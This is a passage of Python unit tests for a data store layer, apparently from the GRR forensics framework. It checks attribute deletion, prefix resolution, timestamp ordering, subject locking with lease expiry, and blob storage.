data_store.DB.DeleteAttributes(
self.test_row, [predicate],
start=3000,
end=4500,
sync=True,
token=self.token)
self.CheckLast(predicate, "hello2000", 2000)
self.CheckLength(predicate, 1)
# Delete everything.
data_store.DB.DeleteAttributes(
self.test_row, [predicate],
start=0,
end=5000,
sync=True,
token=self.token)
self.CheckLast(predicate, None, 0)
self.CheckLength(predicate, 0)
@DeletionTest
def testDeleteSubject(self):
predicate = "metadata:tspredicate"
data_store.DB.Set(
self.test_row,
predicate,
"hello1000",
timestamp=1000,
replace=False,
token=self.token)
data_store.DB.DeleteSubject(self.test_row, token=self.token)
data_store.DB.Flush()
self.CheckLength(predicate, 0)
# This should work with the sync argument too.
data_store.DB.Set(
self.test_row,
predicate,
"hello1000",
timestamp=1000,
replace=False,
token=self.token)
data_store.DB.DeleteSubject(self.test_row, token=self.token, sync=True)
self.CheckLength(predicate, 0)
@DeletionTest
def testDeleteSubjects(self):
row_template = "aff4:/deletesubjectstest%d"
rows = [row_template % i for i in xrange(100)]
predicate = "metadata:tspredicate"
for i, row in enumerate(rows):
data_store.DB.Set(
row,
predicate,
"hello%d" % i,
timestamp=1000,
replace=False,
token=self.token)
data_store.DB.Flush()
data_store.DB.DeleteSubjects(rows[20:80], token=self.token)
data_store.DB.Flush()
res = dict(
data_store.DB.MultiResolvePrefix(rows, predicate, token=self.token))
for i in xrange(100):
if 20 <= i < 80:
# These rows have been deleted.
self.assertNotIn(row_template % i, res)
else:
# These rows should be present.
self.assertIn(row_template % i, res)
def testMultiResolvePrefix(self):
"""tests MultiResolvePrefix."""
rows = self._MakeTimestampedRows()
subjects = dict(
data_store.DB.MultiResolvePrefix(
rows, ["metadata:3", "metadata:7"], token=self.token))
subject_names = subjects.keys()
subject_names.sort()
self.assertEqual(len(subjects), 2)
self.assertEqual(subject_names, [u"aff4:/row:3", u"aff4:/row:7"])
rows = []
for r in range(1, 6):
row_name = "aff4:/prefix_row_%d" % r
rows.append(row_name)
for i in range(1, 6):
timestamp = rdfvalue.RDFDatetime(1000 * i)
data_store.DB.Set(
row_name,
"metadata:%s" % ("X" * i),
str(i),
timestamp=timestamp,
token=self.token)
subjects = dict(
data_store.DB.MultiResolvePrefix(rows, ["metadata:"], token=self.token))
self.assertItemsEqual(subjects.keys(), rows)
row = subjects["aff4:/prefix_row_4"]
self.assertEqual(len(row), 5)
subjects = dict(
data_store.DB.MultiResolvePrefix(
rows, ["metadata:XXX"], token=self.token))
self.assertItemsEqual(subjects.keys(), rows)
for row in subjects.values():
# Those with 3-5 X's.
self.assertEqual(len(row), 3)
self.assertIn((u"metadata:XXX", "3", 3000), row)
self.assertNotIn((u"metadata:XX", "2", 2000), row)
# Test unicode subjects.
unicode_string = u"this is a uñîcödé string"
attributes = set()
for i in range(5, 10):
attributes.add(("metadata:%s" % i, "data%d" % i))
data_store.DB.MultiSet(
unicode_string, {"metadata:%s" % i: ["data%d" % i]}, token=self.token)
result = dict(
data_store.DB.MultiResolvePrefix(
[unicode_string], ["metadata:"], token=self.token))
result_set = set((k, v) for k, v, _ in result[unicode_string])
self.assertEqual(result_set, attributes)
def _MakeTimestampedRows(self):
# Make some rows.
rows = []
for i in range(1, 6):
row_name = "aff4:/row:%s" % i
timestamp = rdfvalue.RDFDatetime(1000 * i)
data_store.DB.Set(
row_name, "metadata:%s" % i, i, timestamp=timestamp, token=self.token)
rows.append(row_name)
for i in range(6, 11):
row_name = "aff4:/row:%s" % i
timestamp = rdfvalue.RDFDatetime(1000 * i)
data_store.DB.MultiSet(
row_name, {"metadata:%s" % i: [i]},
timestamp=timestamp,
token=self.token)
rows.append(row_name)
return rows
def _CheckResultTimestamps(self, result, expected_timestamps):
timestamps = []
for predicates in result.itervalues():
for predicate in predicates:
timestamps.append(predicate[2])
self.assertListEqual(sorted(timestamps), sorted(expected_timestamps))
def testMultiResolvePrefixTypePreservation(self):
"""Check result subjects have same format as original calls."""
rows = [
"aff4:/row:str",
u"aff4:/row:unicode",
rdfvalue.RDFURN("aff4:/row:URN"),
"aff4:/row:str",
u"aff4:/row:unicode",
rdfvalue.RDFURN("aff4:/row:URN"),
]
i = 0
for row_name in rows:
timestamp = rdfvalue.RDFDatetime(1000 + i)
data_store.DB.Set(
row_name, "metadata:%s" % i, i, timestamp=timestamp, token=self.token)
i += 1
subjects = dict(
data_store.DB.MultiResolvePrefix(
rows, ["metadata:0", "metadata:2", "metadata:4"], token=self.token))
self.assertEqual(
set([type(s) for s in subjects]), set([type(s) for s in rows]))
self.assertIn(rows[0], subjects)
self.assertIn(rows[2], subjects)
self.assertIn(rows[4], subjects)
def testResolvePrefixResultsOrderedInDecreasingTimestampOrder1(self):
predicate1 = "metadata:predicate1"
subject = "aff4:/test_resolve_regex_results_order_in_dec_order1"
# Set 100 values with increasing timestamps.
for i in range(100):
data_store.DB.Set(
subject,
predicate1,
str(i),
timestamp=i * 1000,
replace=False,
token=self.token)
# Check that results will be returned in decreasing timestamp order.
# This test along with a next one tests that no matter how
# values were set, they will be sorted by timestamp in the decreasing
# order when fetched.
result = data_store.DB.ResolvePrefix(
subject,
predicate1,
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token)
for result_index, i in enumerate(reversed(range(100))):
self.assertEqual(result[result_index], (predicate1, str(i), i * 1000))
def testResolvePrefixResultsOrderedInDecreasingTimestampOrder2(self):
predicate1 = "metadata:predicate1"
subject = "aff4:/test_resolve_regex_results_order_in_dec_order2"
# Set 100 values with timestamps starting in the future and going to
# the past.
for i in reversed(range(100)):
data_store.DB.Set(
subject,
predicate1,
str(i),
timestamp=i * 1000,
replace=False,
token=self.token)
# Check that results will be returned in decreasing timestamp order.
# This test along with a previous one tests that no matter how
# values were set, they will be sorted by timestamp in the decreasing
# order when fetched.
result = data_store.DB.ResolvePrefix(
subject,
predicate1,
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token)
for result_index, i in enumerate(reversed(range(100))):
self.assertEqual(result[result_index], (predicate1, str(i), i * 1000))
def testResolvePrefixResultsOrderedInDecreasingTimestampOrderPerColumn1(self):
predicate1 = "metadata:predicate1"
predicate2 = "metadata:predicate2"
subject = "aff4:/test_resolve_regex_results_order_in_dec_order_per_column1"
# Set 100 values with increasing timestamps for each predicate.
for i in range(100):
data_store.DB.Set(
subject,
predicate1,
str(i),
timestamp=i * 1000,
replace=False,
token=self.token)
data_store.DB.Set(
subject,
predicate2,
str(i),
timestamp=i * 1000,
replace=False,
token=self.token)
# Check that results will be returned in decreasing timestamp order
# per column.
# This test along with a previous one tests that no matter how
# values were set, they will be sorted by timestamp in the decreasing
# order when fetched.
result = list(
data_store.DB.ResolvePrefix(
subject,
"metadata:predicate",
timestamp=data_store.DB.ALL_TIMESTAMPS,
limit=1000,
token=self.token))
predicate1_results = [r for r in result if r[0] == predicate1]
for result_index, i in enumerate(reversed(range(100))):
self.assertEqual(predicate1_results[result_index], (predicate1, str(i),
i * 1000))
predicate2_results = [r for r in result if r[0] == predicate2]
for result_index, i in enumerate(reversed(range(100))):
self.assertEqual(predicate2_results[result_index], (predicate2, str(i),
i * 1000))
def testResolvePrefixResultsOrderedInDecreasingTimestampOrderPerColumn2(self):
predicate1 = "metadata:predicate1"
predicate2 = "metadata:predicate2"
subject = "aff4:/test_resolve_regex_results_order_in_dec_order_per_column2"
# Set 100 values for each predicate with timestamps starting in the
# future and going to the past.
for i in reversed(range(100)):
data_store.DB.Set(
subject,
predicate1,
str(i),
timestamp=i * 1000,
replace=False,
token=self.token)
data_store.DB.Set(
subject,
predicate2,
str(i),
timestamp=i * 1000,
replace=False,
token=self.token)
# Check that results will be returned in decreasing timestamp order
# per column.
# This test along with a previous one tests that no matter how
# values were set, they will be sorted by timestamp in the decreasing
# order when fetched.
result = list(
data_store.DB.ResolvePrefix(
subject,
"metadata:predicate",
timestamp=data_store.DB.ALL_TIMESTAMPS,
limit=1000,
token=self.token))
predicate1_results = [r for r in result if r[0] == predicate1]
for result_index, i in enumerate(reversed(range(100))):
self.assertEqual(predicate1_results[result_index], (predicate1, str(i),
i * 1000))
predicate2_results = [r for r in result if r[0] == predicate2]
for result_index, i in enumerate(reversed(range(100))):
self.assertEqual(predicate2_results[result_index], (predicate2, str(i),
i * 1000))
def testScanAttribute(self):
data_store.DB.Set("aff4:/A", "aff4:foo", "A value", token=self.token)
for i in range(1, 10):
data_store.DB.Set(
"aff4:/B/" + str(i),
"aff4:foo",
"B " + str(i) + " old value",
timestamp=2000,
token=self.token)
data_store.DB.Set(
"aff4:/B/" + str(i),
"aff4:foo",
"B " + str(i) + " value",
timestamp=2000,
token=self.token)
data_store.DB.Set(
"aff4:/B/" + str(i),
"aff4:foo",
"B " + str(i) + " older value",
timestamp=1900,
token=self.token,
replace=False)
# Something with a different attribute, which should not be included.
data_store.DB.Set(
"aff4:/B/1.1",
"aff4:foo2",
"B 1.1 other value",
timestamp=2000,
token=self.token)
data_store.DB.Set("aff4:/C", "aff4:foo", "C value", token=self.token)
values = [(r[1], r[2])
for r in data_store.DB.ScanAttribute(
"aff4:/B", "aff4:foo", token=self.token)]
self.assertEqual(values, [(2000, "B " + str(i) + " value")
for i in range(1, 10)])
values = [
r[2]
for r in data_store.DB.ScanAttribute(
"aff4:/B", "aff4:foo", max_records=2, token=self.token)
]
self.assertEqual(values, ["B " + str(i) + " value" for i in range(1, 3)])
values = [
r[2]
for r in data_store.DB.ScanAttribute(
"aff4:/B", "aff4:foo", after_urn="aff4:/B/2", token=self.token)
]
self.assertEqual(values, ["B " + str(i) + " value" for i in range(3, 10)])
values = [
r[2]
for r in data_store.DB.ScanAttribute(
"aff4:/B",
u"aff4:foo",
after_urn=rdfvalue.RDFURN("aff4:/B/2"),
max_records=2,
token=self.token)
]
self.assertEqual(values, ["B " + str(i) + " value" for i in range(3, 5)])
values = [
r[2]
for r in data_store.DB.ScanAttribute(
"aff4:/", "aff4:foo", token=self.token)
]
self.assertEqual(
values, ["A value"] + ["B " + str(i) + " value"
for i in range(1, 10)] + ["C value"])
values = [
r[2]
for r in data_store.DB.ScanAttribute("", "aff4:foo", token=self.token)
]
self.assertEqual(
values, ["A value"] + ["B " + str(i) + " value"
for i in range(1, 10)] + ["C value"])
data_store.DB.Set(
"aff4:/files/hash/generic/sha1/", "aff4:hash", "h1", token=self.token)
data_store.DB.Set(
"aff4:/files/hash/generic/sha1/AAAAA",
"aff4:hash",
"h2",
token=self.token)
data_store.DB.Set(
"aff4:/files/hash/generic/sha1/AAAAB",
"aff4:hash",
"h3",
token=self.token)
data_store.DB.Set(
"aff4:/files/hash/generic/sha256/", "aff4:hash", "h4", token=self.token)
data_store.DB.Set(
"aff4:/files/hash/generic/sha256/AAAAA",
"aff4:hash",
"h5",
token=self.token)
data_store.DB.Set(
"aff4:/files/hash/generic/sha256/AAAAB",
"aff4:hash",
"h6",
token=self.token)
data_store.DB.Set(
"aff4:/files/hash/generic/sha90000",
"aff4:hash",
"h7",
token=self.token)
(value, _) = data_store.DB.Resolve(
"aff4:/files/hash/generic/sha90000", "aff4:hash", token=self.token)
self.assertEqual(value, "h7")
values = [
r[2]
for r in data_store.DB.ScanAttribute(
"aff4:/files/hash", "aff4:hash", token=self.token)
]
self.assertEqual(values, ["h1", "h2", "h3", "h4", "h5", "h6", "h7"])
values = [
r[2]
for r in data_store.DB.ScanAttribute(
"aff4:/files/hash",
"aff4:hash",
token=self.token,
relaxed_order=True)
]
self.assertEqual(sorted(values), ["h1", "h2", "h3", "h4", "h5", "h6", "h7"])
def testScanAttributes(self):
for i in range(0, 7):
data_store.DB.Set(
"aff4:/C/" + str(i),
"aff4:foo",
"C foo " + str(i) + " value",
timestamp=10000,
token=self.token)
data_store.DB.Set(
"aff4:/C/" + str(i),
"aff4:foo",
"C foo " + str(i) + " old value",
timestamp=9000,
token=self.token,
replace=False)
for i in range(3, 10):
data_store.DB.Set(
"aff4:/C/" + str(i),
"aff4:bar",
"C bar " + str(i) + " value",
timestamp=15000,
token=self.token)
data_store.DB.Set(
"aff4:/C/" + str(i),
"aff4:bar",
"C bar " + str(i) + " old value",
timestamp=9500,
token=self.token,
replace=False)
data_store.DB.Set(
"aff4:/C/5a",
"aff4:baz",
"C baz value",
timestamp=9800,
token=self.token)
results = list(
data_store.DB.ScanAttributes(
"aff4:/C", ["aff4:foo", "aff4:bar"], token=self.token))
self.assertEqual(len(results), 10)
self.assertEqual([s for s, _ in results],
["aff4:/C/" + str(i) for i in range(10)])
self.assertEqual(results[0][1], {"aff4:foo": (10000, "C foo 0 value")})
self.assertEqual(results[5][1], {
"aff4:bar": (15000, "C bar 5 value"),
"aff4:foo": (10000, "C foo 5 value")
})
self.assertEqual(results[9][1], {"aff4:bar": (15000, "C bar 9 value")})
results = list(
data_store.DB.ScanAttributes(
"aff4:/C", ["aff4:foo", "aff4:bar"],
max_records=5,
token=self.token))
self.assertEqual(len(results), 5)
def testRDFDatetimeTimestamps(self):
test_rows = self._MakeTimestampedRows()
# Make sure all timestamps are set correctly.
result = dict(
data_store.DB.MultiResolvePrefix(
test_rows, ["metadata:"], token=self.token))
self._CheckResultTimestamps(result, range(1000, 11000, 1000))
# Now MultiResolve by timestamp.
timestamp = (rdfvalue.RDFDatetime(3000), rdfvalue.RDFDatetime(8000))
result = dict(
data_store.DB.MultiResolvePrefix(
test_rows, ["metadata:"], token=self.token, timestamp=timestamp))
# Timestamp selection is inclusive so we should have 3k-8k.
self._CheckResultTimestamps(result, range(3000, 9000, 1000))
# Now test timestamped attributes.
row_name = "aff4:/attribute_test_row"
attribute_name = "metadata:test_attribute"
attributes_to_set = {
attribute_name: [(i, rdfvalue.RDFDatetime(i))
for i in xrange(1000, 11000, 1000)]
}
data_store.DB.MultiSet(
row_name, attributes_to_set, replace=False, token=self.token)
# Make sure all timestamps are set correctly.
result = dict(
data_store.DB.MultiResolvePrefix(
[row_name], ["metadata:"],
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token))
self._CheckResultTimestamps(result, range(1000, 11000, 1000))
if self.TEST_DELETION:
# Delete some of them.
data_store.DB.DeleteAttributes(
row_name, [attribute_name],
start=rdfvalue.RDFDatetime(2000),
end=rdfvalue.RDFDatetime(4000),
token=self.token)
# Make sure that passing start==end deletes that version.
data_store.DB.DeleteAttributes(
row_name, [attribute_name],
start=rdfvalue.RDFDatetime(6000),
end=rdfvalue.RDFDatetime(6000),
token=self.token)
result = dict(
data_store.DB.MultiResolvePrefix(
[row_name], ["metadata:"],
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token))
expected_timestamps = [1000, 5000, 7000, 8000, 9000, 10000]
self._CheckResultTimestamps(result, expected_timestamps)
@DBSubjectLockTest
def testDBSubjectLocks(self):
"""Test lock locking."""
predicate = u"metadata:predicateÎñţér"
subject = u"aff4:/metadata:rowÎñţér"
# t1 is holding a lock on this row.
with data_store.DB.DBSubjectLock(subject, lease_time=100, token=self.token):
# This means that modification of this row will fail using a different
# lock.
self.assertRaises(
data_store.DBSubjectLockError,
data_store.DB.DBSubjectLock,
subject,
lease_time=100,
token=self.token)
data_store.DB.Set(subject, predicate, "1", token=self.token)
self.assertEqual(
data_store.DB.Resolve(subject, predicate, token=self.token)[0], "1")
t2 = data_store.DB.DBSubjectLock(subject, lease_time=100, token=self.token)
self.assertRaises(
data_store.DBSubjectLockError,
data_store.DB.DBSubjectLock,
subject,
lease_time=100,
token=self.token)
t2.Release()
t3 = data_store.DB.DBSubjectLock(subject, lease_time=100, token=self.token)
self.assertTrue(t3.CheckLease())
t3.Release()
@DBSubjectLockTest
def testDBSubjectLockIndependence(self):
"""Check that locks don't influence each other."""
subject = u"aff4:/metadata:rowÎñţér"
subject2 = u"aff4:/metadata:rowÎñţér2"
t1 = data_store.DB.DBSubjectLock(subject, lease_time=100, token=self.token)
# Check it's locked.
self.assertRaises(
data_store.DBSubjectLockError,
data_store.DB.DBSubjectLock,
subject,
lease_time=100,
token=self.token)
# t2 is holding a lock on this row.
t2 = data_store.DB.DBSubjectLock(subject2, lease_time=100, token=self.token)
# This means that modification of this row will fail using a different
# lock.
self.assertRaises(
data_store.DBSubjectLockError,
data_store.DB.DBSubjectLock,
subject2,
lease_time=100,
token=self.token)
t2.Release()
# Subject 1 should still be locked.
self.assertRaises(
data_store.DBSubjectLockError,
data_store.DB.DBSubjectLock,
subject,
lease_time=100,
token=self.token)
t1.Release()
@DBSubjectLockTest
def testDBSubjectLockLease(self):
# This needs to be current time or cloud bigtable server will reply with
# deadline exceeded because the RPC is too old.
now = int(time.time())
with test_lib.FakeTime(now):
with data_store.DB.DBSubjectLock(
self.lease_row, lease_time=100, token=self.token) as lock:
self.assertEqual(lock.CheckLease(), 100)
self.assertTrue(lock.locked)
# Set our expiry time to now + 2 * 100
lock.UpdateLease(2 * 100)
self.assertEqual(lock.CheckLease(), 2 * 100)
# Deliberately call release twice, __exit__ will also call
lock.Release()
@DBSubjectLockTest
def testDBSubjectLockLeaseExpiryWithExtension(self):
now = int(time.time())
# Cloud Bigtable RPC library doesn't like long, convert to int
lease_time = 100
with test_lib.FakeTime(now):
lock = data_store.DB.DBSubjectLock(
self.lease_row, lease_time=lease_time, token=self.token)
self.assertEqual(lock.expires, int(now + lease_time) * 1e6)
lock.UpdateLease(2 * lease_time)
self.assertEqual(lock.expires, int(now + (2 * lease_time)) * 1e6)
# Lock should still be active
with test_lib.FakeTime(now + lease_time + 1):
self.assertRaises(
data_store.DBSubjectLockError,
data_store.DB.DBSubjectLock,
self.lease_row,
lease_time=lease_time,
token=self.token)
# Now it is expired
with test_lib.FakeTime(now + (2 * lease_time) + 1):
data_store.DB.DBSubjectLock(
self.lease_row, lease_time=lease_time, token=self.token)
@DBSubjectLockTest
def testDBSubjectLockLeaseExpiry(self):
now = int(time.time())
lease_time = 100
with test_lib.FakeTime(now):
lock = data_store.DB.DBSubjectLock(
self.lease_row, lease_time=lease_time, token=self.token)
self.assertEqual(lock.CheckLease(), lease_time)
self.assertRaises(
data_store.DBSubjectLockError,
data_store.DB.DBSubjectLock,
self.lease_row,
lease_time=lease_time,
token=self.token)
# Almost expired
with test_lib.FakeTime(now + lease_time - 1):
self.assertRaises(
data_store.DBSubjectLockError,
data_store.DB.DBSubjectLock,
self.lease_row,
lease_time=lease_time,
token=self.token)
# Expired
after_expiry = now + lease_time + 1
with test_lib.FakeTime(after_expiry):
lock = data_store.DB.DBSubjectLock(
self.lease_row, lease_time=lease_time, token=self.token)
self.assertEqual(lock.CheckLease(), lease_time)
self.assertEqual(lock.expires, int((after_expiry + lease_time) * 1e6))
@DBSubjectLockTest
def testLockRetryWrapperTemporaryFailure(self):
"""Two failed attempts to get the lock, then a succcess."""
lock = mock.MagicMock()
with mock.patch.object(time, "sleep", return_value=None) as mock_time:
with mock.patch.object(
data_store.DB,
"DBSubjectLock",
side_effect=[
data_store.DBSubjectLockError("1"),
data_store.DBSubjectLockError("2"), lock
]):
lock = data_store.DB.LockRetryWrapper(
"aff4:/something", token=self.token)
# We slept and retried twice
self.assertEqual(mock_time.call_count, 2)
lock.Release()
@DBSubjectLockTest
def testLockRetryWrapperNoBlock(self):
subject = "aff4:/noblocklock"
lock = data_store.DB.DBSubjectLock(
subject, lease_time=100, token=self.token)
with mock.patch.object(time, "sleep", return_value=None) as mock_time:
with self.assertRaises(data_store.DBSubjectLockError):
data_store.DB.LockRetryWrapper(
subject, lease_time=100, token=self.token, blocking=False)
self.assertEqual(mock_time.call_count, 0)
lock.Release()
@DBSubjectLockTest
def testLockRetryWrapperCompleteFailure(self):
subject = "aff4:/subject"
# We need to sync this delete or it happens after we take the lock and
# messes up the test.
data_store.DB.DeleteSubject(subject, token=self.token, sync=True)
lock = data_store.DB.DBSubjectLock(
subject, lease_time=100, token=self.token)
# By mocking out sleep we can ensure all retries are exhausted.
with mock.patch.object(time, "sleep", return_value=None):
with self.assertRaises(data_store.DBSubjectLockError):
data_store.DB.LockRetryWrapper(
subject, lease_time=100, token=self.token)
lock.Release()
def testTimestamps(self):
"""Check that timestamps are reasonable."""
predicate = "metadata:predicate"
subject = "aff4:test_timestamps"
# Extend the range of valid timestamps returned from the table to account
# for potential clock skew.
start = long(time.time() - 60) * 1e6
data_store.DB.Set(subject, predicate, "1", token=self.token)
stored, ts = data_store.DB.Resolve(subject, predicate, token=self.token)
# Check the time is reasonable
end = long(time.time() + 60) * 1e6
self.assertTrue(ts >= start and ts <= end)
self.assertEqual(stored, "1")
def testSpecificTimestamps(self):
"""Check arbitrary timestamps can be specified."""
predicate = "metadata:predicate"
subject = "aff4:/test_specific_timestamps"
# Check we can specify a timestamp
data_store.DB.Set(subject, predicate, "2", timestamp=1000, token=self.token)
stored, ts = data_store.DB.Resolve(subject, predicate, token=self.token)
# Check the time is reasonable
self.assertEqual(ts, 1000)
self.assertEqual(stored, "2")
def testNewestTimestamps(self):
"""Check that NEWEST_TIMESTAMP works as expected."""
predicate1 = "metadata:predicate1"
predicate2 = "metadata:predicate2"
# Check we can specify a timestamp
data_store.DB.Set(
self.test_row,
predicate1,
"1.1",
timestamp=10000,
replace=False,
token=self.token)
data_store.DB.Set(
self.test_row,
predicate1,
"1.2",
timestamp=20000,
replace=False,
token=self.token)
data_store.DB.Set(
self.test_row,
predicate2,
"2.1",
timestamp=11000,
replace=False,
token=self.token)
data_store.DB.Set(
self.test_row,
predicate2,
"2.2",
timestamp=22000,
replace=False,
token=self.token)
result = data_store.DB.ResolvePrefix(
self.test_row,
predicate1,
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token)
# Should return 2 results. Newest should be first.
values = [x[1] for x in result]
self.assertEqual(len(values), 2)
self.assertListEqual(values, ["1.2", "1.1"])
times = [x[2] for x in result]
self.assertListEqual(times, [20000, 10000])
result = data_store.DB.ResolvePrefix(
self.test_row,
predicate1,
timestamp=data_store.DB.NEWEST_TIMESTAMP,
token=self.token)
# Should return 1 result - the most recent.
self.assertEqual(len(result), 1)
self.assertEqual(result[0][1], "1.2")
self.assertEqual(result[0][2], 20000)
result = list(
data_store.DB.ResolvePrefix(
self.test_row,
"metadata:",
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token))
self.assertEqual(len(result), 4)
self.assertListEqual([r for r in result if r[0] == "metadata:predicate1"],
[(u"metadata:predicate1", "1.2", 20000),
(u"metadata:predicate1", "1.1", 10000)])
self.assertListEqual([r for r in result if r[0] == "metadata:predicate2"],
[(u"metadata:predicate2", "2.2", 22000),
(u"metadata:predicate2", "2.1", 11000)])
result = list(
data_store.DB.ResolvePrefix(
self.test_row,
"metadata:",
timestamp=data_store.DB.NEWEST_TIMESTAMP,
token=self.token))
# Should only return the latest version.
self.assertItemsEqual(result, [(u"metadata:predicate1", "1.2", 20000),
(u"metadata:predicate2", "2.2", 22000)])
@DeletionTest
def testTimestampEdgeCases(self):
row = "aff4:/row"
attribute = "metadata:attribute"
for i in range(4):
# First TS is 0!
timestamp = rdfvalue.RDFDatetime(1000 * i)
data_store.DB.MultiSet(
row, {attribute: [i]},
timestamp=timestamp,
replace=False,
token=self.token)
rows = data_store.DB.ResolvePrefix(
row,
"metadata:",
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token)
self.assertEqual(len(rows), 4)
self.assertItemsEqual([r[2] for r in rows], [0, 1000, 2000, 3000])
data_store.DB.DeleteAttributes(
row, [attribute], start=0, end=0, token=self.token)
rows = data_store.DB.ResolvePrefix(
row,
"metadata:",
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token)
self.assertEqual(len(rows), 3)
self.assertItemsEqual([r[2] for r in rows], [1000, 2000, 3000])
def testResolvePrefix(self):
predicate = "metadata:predicate"
subject = "aff4:/test_resolve_regex_prefix"
# Check we can specify a timestamp
data_store.DB.Set(subject, predicate, "3", token=self.token)
results = [
x
for x in data_store.DB.ResolvePrefix(
subject, "metadata:", token=self.token)
]
self.assertEqual(len(results), 1)
# Value
self.assertEqual(results[0][1], "3")
# Predicate
self.assertEqual(results[0][0], predicate)
def testResolveMulti(self):
"""Test regex Multi Resolving works."""
subject = "aff4:/resolve_multi"
predicates = []
predicate_values = []
for i in range(0, 100):
predicate = "metadata:predicate" + str(i)
predicates.append(predicate)
predicate_values.append("Cell " + predicate)
data_store.DB.Set(
subject,
predicate,
"Cell " + predicate,
timestamp=1000,
token=self.token)
results = [
x
for x in data_store.DB.ResolveMulti(
subject, predicates, token=self.token)
]
self.assertEqual(len(results), 100)
self.assertItemsEqual(predicates, [x[0] for x in results])
self.assertItemsEqual(predicate_values, [x[1] for x in results])
# Now try to query for non existent predicates.
predicates = predicates[:10]
predicate_values = predicate_values[:10]
for i in range(10):
predicates.append("metadata:not_existing" + str(i))
results = [
x
for x in data_store.DB.ResolveMulti(
subject, predicates, token=self.token)
]
self.assertEqual(10, len(results))
self.assertItemsEqual(predicates[:10], [x[0] for x in results])
self.assertItemsEqual(predicate_values, [x[1] for x in results])
def testBlobs(self):
data = "randomdata" * 50
identifier = data_store.DB.StoreBlob(data, token=self.token)
self.assertTrue(data_store.DB.BlobExists(identifier, token=self.token))
self.assertEqual(data_store.DB.ReadBlob(identifier, token=self.token), data)
empty_digest = hashlib.sha256().hexdigest()
self.assertFalse(data_store.DB.BlobExists(empty_digest, token=self.token))
self.assertIsNone(data_store.DB.ReadBlob(empty_digest, token=self.token))
@DeletionTest
def testBlobDeletion(self):
data = "randomdata" * 50
identifier = data_store.DB.StoreBlob(data, token=self.token)
self.assertTrue(data_store.DB.BlobExists(identifier, token=self.token))
self.assertEqual(data_store.DB.ReadBlob(identifier, token=self.token), data)
data_store.DB.DeleteBlob(identifier, token=self.token)
self.assertFalse(data_store.DB.BlobExists(identifier, token=self.token))
self.assertEqual(data_store.DB.ReadBlob(identifier, token=self.token), None)
def testAFF4BlobImage(self):
# 500k
data = "randomdata" * 50 * 1024
identifier = data_store.DB.StoreBlob(data, token=self.token)
# Now create the image containing the blob.
fd = aff4.FACTORY.Create(
"aff4:/C.1235/image", standard.BlobImage, token=self.token)
fd.SetChunksize(512 * 1024)
fd.Set(fd.Schema.STAT())
fd.AddBlob(identifier.decode("hex"), len(data))
fd.Close(sync=True)
# Chunks are written async, we have to flush here.
data_store.DB.Flush()
# Check if we can read back the data.
fd = aff4.FACTORY.Open("aff4:/C.1235/image", token=self.token)
self.assertEqual(
fd.read(len(data)), data,
"Data read back from aff4image doesn't match.")
fd.Close()
def testDotsInDirectory(self):
"""Dots are special in MongoDB, check that they work in rows/indexes."""
for directory in [
"aff4:/C.1240/dir", "aff4:/C.1240/dir/a.b", "aff4:/C.1240/dir/a.b/c",
"aff4:/C.1240/dir/b"
]:
aff4.FACTORY.Create(
directory, standard.VFSDirectory, token=self.token).Close()
# We want the indexes to be written now.
data_store.DB.Flush()
# This must not raise.
aff4.FACTORY.Open(
"aff4:/C.1240/dir/a.b/c", standard.VFSDirectory, token=self.token)
index = data_store.DB.ResolvePrefix(
"aff4:/C.1240/dir", "index:dir/", token=self.token)
subjects = [s for (s, _, _) in index]
self.assertTrue("index:dir/b" in subjects)
self.assertTrue("index:dir/a.b" in subjects)
directory = aff4.FACTORY.Open("aff4:/C.1240/dir", token=self.token)
self.assertEqual(2, len(list(directory.OpenChildren())))
self.assertEqual(2, len(list(directory.ListChildren())))
OPEN_WITH_LOCK_NUM_THREADS = 10
OPEN_WITH_LOCK_TRIES_PER_THREAD = 3
OPEN_WITH_LOCK_SYNC_LOCK_SLEEP = 0.2
@test_lib.SetLabel("large")
@DBSubjectLockTest
def testAFF4OpenWithLock(self):
self.opened = False
self.client_urn = "aff4:/C.0000000000000001"
client = aff4.FACTORY.Create(
self.client_urn, aff4_grr.VFSGRRClient, mode="w", token=self.token)
client.Set(client.Schema.HOSTNAME("client1"))
client.Set(
client.Schema.LEASED_UNTIL(rdfvalue.RDFDatetime().FromSecondsFromEpoch(
0)))
client.Close()
self.open_failures = 0
self.close_failures = 0
self.results = []
def ParallelThread():
for _ in xrange(self.OPEN_WITH_LOCK_TRIES_PER_THREAD):
t = time.time()
try:
with aff4.FACTORY.OpenWithLock(
self.client_urn,
token=self.token,
blocking=True,
blocking_sleep_interval=self.OPEN_WITH_LOCK_SYNC_LOCK_SLEEP,
blocking_lock_timeout=10):
# We fail if another thread has the object already opened here.
if self.opened:
self.open_failures += 1
self.fail("Double open!")
self.opened = True
logging.info("Thread %s holding lock for 0.5 seconds.",
thread.get_ident())
time.sleep(0.5)
# We fail if someone has closed the object while we are holding it
# opened.
if not self.opened:
self.close_failures += 1
self.fail("Double close!")
self.results.append(thread.get_ident())
self.opened = False
return
except aff4.LockError:
logging.info("Lock failed after %s seconds - retying.",
(time.time() - t))
threads = []
for _ in range(self.OPEN_WITH_LOCK_NUM_THREADS):
t = threading.Thread(target=ParallelThread)
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
self.assertEqual(self.open_failures, 0)
self.assertEqual(self.close_failures, 0)
# Make sure all threads got it eventually.
self.assertEqual(len(self.results), self.OPEN_WITH_LOCK_NUM_THREADS)
def _ListedMultiResolvePrefix(self, *args, **kwargs):
return list(data_store.DB.MultiResolvePrefix(*args, **kwargs))
def _ListedResolveMulti(self, *args, **kwargs):
return list(data_store.DB.ResolveMulti(*args, **kwargs))
def _ListedResolvePrefix(self, *args, **kwargs):
return list(data_store.DB.ResolvePrefix(*args, **kwargs))
def _FlushedDeleteSubject(self, *args, **kwargs):
# DeleteSubject is not guaranteed to be synchronous. Make sure that
# we flush data store when testing it.
data_store.DB.DeleteSubject(*args, **kwargs)
data_store.DB.Flush()
def testLimits(self):
# Create 10 rows with 10 attributes each.
subjects = ["aff4:limittest_%d" % i for i in xrange(10)]
attributes = ["metadata:limittest_%d" % i for i in xrange(10)]
value_idx = 0
for subject in subjects:
for attribute in attributes:
